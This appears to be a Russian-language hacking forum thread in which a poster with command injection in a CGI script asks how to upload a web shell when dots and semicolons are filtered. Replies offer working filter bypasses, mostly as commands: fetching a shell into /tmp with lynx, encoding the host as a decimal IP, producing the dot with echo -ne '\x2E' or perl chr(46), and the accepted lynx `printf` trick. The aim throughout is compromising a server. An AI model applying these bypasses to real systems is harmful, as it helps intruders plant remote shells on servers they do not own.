Короче есть бага в cgi скрипте могу исполнять команды но не могу использывать .
Сначало думал что это куйн но потом понял что залить шелл просто не реально.
Да ; тоже нельзя.


Вопрос как залить шелл не используя точки. на серваке есть lynx из загрузчиков.

варианты извменить точку в чего либо (url кодировку не предлогать)

записать эхом в файл без точки в 2 или 16 коде потом утилитой перекодировать и исполнить как .sh

Как реалиховать у вас есть какие то идеи?

Если я все правильно понял (хотя не уверен), то достаточно перевести команду в hex и залить шелл, если есть права на запись.
ha.ckers.org/xss.html

как перевести в хекс я знаю )
нужна утилита в стандартной поставке котороая могла бы текст в файле (допусти hex) преобраховать в нормальный. короче мне надо залить шелл не используя точки и точки с запятой.

В стандартных утилитах такого, по-моему, нет. Для этого пишутся скрипты на bash или perl. Но его еще нужно туда залить.
www.computing.net/unix/wwwboard/forum/6894.html
Там несколько вариантов скриптов, переводящих hex в ascii.

cd /tmp && lynx <url>
не выход?

cd /tmp && lynx http://ya.ru/shell
без точек...

А cd /tmp && lynx http://ya%2Eru/shell ?

нет
варианты извменить точку в чего либо (url кодировку не предлогать)
читаем внимательней.
url приобразовываеться. и в конечном запросе .

Прийдется преобразовывать ип домена ya.ru в что-то вроде 0x34a2462d.
Хз, других идей у меня нет...

2Deem3n® (member.php?u=19164)
так скачаеться????

Проверяю... :)

UPD:
Опера почему-то с такими ссылками не пашет... а lynx не установлен.
Прочитай вот это и сам попробуй:
http://www.pc-help.org/obscure.htm#dword

UPD2:
а пинг работает... :)
dima@gentoo-fn ~ $ ping 3578842120
PING 3578842120 (213.80.204.8) 56(84) bytes of data.
...обфускатор тут:
http://www.odditysoftware.com/page-webtools5.htm

да старый способ.
щас будем тестить на совместимость с lynx.

не хотит

хых... почитал топик но так и не понял причём тут /bin/bash. Там может любая командная оболочка стоять =)

Если я правильно понял задачу, что ты хочешь выполнить, то средствами командной оболочки, заметь (не обязательно bash), это можно сделать так:
echo -ne "\x2E" > file

Вывести точку можно так:
`perl -e "print 'chr(46)'"`

не знаком с перлом как допустим создать файл с текстом
http://ya.ru/index.html

при вводе исползуя char
и вывести его в файл aaa допустим?

2[ cash ] чем тебя printf + `cmd` не устраивает?

2ZaCo (member.php?u=17423)
пример можно?

lynx `printf "http://ya\x2Eru"`

Всем спасибо можно закрыть.